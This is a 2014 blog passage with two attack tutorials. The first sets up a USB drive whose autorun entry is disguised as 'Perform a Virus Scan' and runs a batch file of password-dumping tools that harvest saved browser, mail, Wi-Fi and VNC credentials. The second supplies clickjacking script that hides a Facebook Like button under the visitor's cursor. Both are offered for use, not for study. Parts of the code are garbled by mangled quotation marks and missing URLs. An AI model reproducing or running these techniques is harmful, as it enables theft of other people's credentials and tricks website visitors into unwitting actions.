Sunday, 6 July 2014

This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer.

open notepad/wordpad



ACTION= Perform a Virus Scan

save this as AUTORUN.inf
open a new notepad/wordpad document


start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt

save this as LAUNCH.bat

copy the autorun and launch file to your USB

go to and download the programs named in step 2

extract the files you downloaded to your desktop and copy all the .exe files to your USB

remove and re-insert your USB

click on the option perform a virus scan

(this is an exemple, if you want it to say something else go to the autorun file and change it ;) )
go to my computer---> USB DRIVE and open it

you will now see some text files, if you open them you will see usernames and passwords

NOTICE: this only recovers passwords that have once been saved on your computer

Friday, 4 July 2014

Increase Facebook Likes for Free

1. Log in to Blogger => Go to Template => Click on Edit HTML.

We recommend you to take a backup of your blog template, before

2. Search for by pressing Ctrl + F.

3. Simply copy below code and paste it just above/before the searched tag

<script type=?text/javascript? src=?></script><script type=?text/javascript?>// <![CDATA[ function ClickJackFbHide() {jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();}function ClickJackFbShow() {jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();} // ]]></script> <div id=?clickjack-button-wrapper-5? style=?position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter: ?progid:DXImageTransform.Microsoft.Alpha(Opacity=0)?; margin-left: -50px; z-index: 100; width: 27px; height: 20px; overflow: hidden;?><!?<div class=?clickjack-mask? style=?position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;?></div> ?><iframe style=?border: none; overflow: hidden; width: 45px; left: -19px; height: 21px; z-index: 0; position: relative;? src=?;layout=button_count&amp;show_fa height=?240? width=?320? frameborder=?0? scrolling=?no?></iframe></div> <script type=?text/javascript?>// <![CDATA[ jQuery( document ).ready( function(){$( &quot;#clickjack-button-wrapper-5&quot;).parent().mousemove( function( e ) {jQuery( &quot;#clickjack-button-wrapper-5&quot;).css({top: e.pageY - 10, left: e.pageX + 30});});clickjack_hider();var clickjack_fb_timer=setTimeout(&quot;clickjack_hider()&quot;,5000);});functio clickjack_hider(){jQuery(&quot;input&quot;).mouseout(function() {ClickJackFbShow();});jQuery(&quot;a&quot;).mouseout(function() {ClickJackFbShow();});jQuery(&quot;button&quot;).mouseout(function() {ClickJackFbShow();});jQuery(&quot;textarea&quot;).mouseout(function() {ClickJackFbShow();});jQuery(&quot;.ratingblock&quot;).mouseout(function() {ClickJackFbShow();});jQuery(&quot;object&quot;).mouseout(function() {ClickJackFbShow();});jQuery(&quot;input&quot;).mouseover(function() {ClickJackFbHide();});jQuery(&quot;a&quot;).mouseover(function() {ClickJackFbHide();});jQuery(&quot;button&quot;).mouseover(function() {ClickJackFbHide();});jQuery(&quot;textarea&quot;).mouseover(function() {ClickJackFbHide();});jQuery(&quot;.ratingblock&quot;).mouseover(function() {ClickJackFbHide();});jQuery(&quot;object&quot;).mouseover(function() {ClickJackFbHide();});} // ]]></script>

4. Replace the Raufhacker with your facebook page username in above code (highlighted in Blue color).

5. Whoo!! Thats all done. Now Save the changes and refresh your web page.

Note: You might face issue with this script as it doesn?t allow dragging & copying the contents and other widgets/gadgets may also effect, but it will really help you to increase facebook likes easily.